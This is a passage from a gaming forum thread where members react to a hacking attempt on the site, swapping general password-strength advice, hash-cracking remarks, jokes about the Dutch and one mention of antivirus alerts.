    And there are now cloud based hashes generated by the billions so that if you happen to obtain someone's hash you can enter it into a website and get a match instantly. So, just because I do not believe your information was obtained, change it anyways.
    Last edited by GrnEyedDvl; March 28, 2015 at 05:04 PM.

  14. #14
    Magister Militum Flavius Aetius's Avatar δούξ θρᾳκήσιου
    Join Date
    Mar 2010
    Location
    Rock Hill, SC
    Posts
    16,318
    Tournaments Joined
    1
    Tournaments Won
    0

    Default Re: Site Hack Attempt

    Just using all lowercase letters, 10 characters long, it would take 476 years to brute force a password. Add one more character and it jumps up to 12,000.

    E.g. One of my passwords would take 172 million years according to that website.

  15. #15
    The Bold Burgundian's Avatar Ducenarius
    Join Date
    May 2007
    Location
    The Great Metropolis of Hyperbole
    Posts
    997

    Default Re: Site Hack Attempt

    The obvious solution is just to forbid all web traffic and users from the netherlands, good, I never liked those rebels anyway.
    T.W.C.
    Total War Cynics

  16. #16
    Col. Tartleton's Avatar Comes Limitis
    Join Date
    Aug 2010
    Location
    Cape Ann
    Posts
    13,053

    Default Re: Site Hack Attempt

    The Dutch are a good honest hard working people who should not be treated unfairly just because their language sounds like they had a head injury.
    The Earth is inhabited by billions of idiots.
    The search for intelligent life continues...

  17. #17

    Default Re: Site Hack Attempt

    Hm, ok I'm not sure if this is related but my Malwarebytes Anti-Malware was detecting attacks every time I logged on TWC on the 22-23-24. I thought it was a mistake and moved on.
    It has recorded an IP and a website from where the attacks actually came from.

  18. #18
    Quintus Hortensius Hortalus's Avatar Lex duodecim tabularum
    Citizen

    Join Date
    Jun 2011
    Location
    Electorate of Hannover
    Posts
    2,530

    Default Re: Site Hack Attempt

    Thanks for he detailed report and explanations GED

    Under the patronage of wangrin my workshop

  19. #19

    Default Re: Site Hack Attempt

    Enoch playing the long game

  20. #20
    Junaidi83 de Bodemloze's Avatar Dont Mess With Me
    Join Date
    Feb 2011
    Location
    Indonesia
    Posts
    2,616

    Default Re: Site Hack Attempt

    Hmm impressive stuff i said , still i see no reason why he target TWC, unless there is credit card number or other money related stuff.
    Modding is like accursed wine, you try a sip and you ended empty the whole glass
    Under Proud Patronage of Shankbot de Bodemloze

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •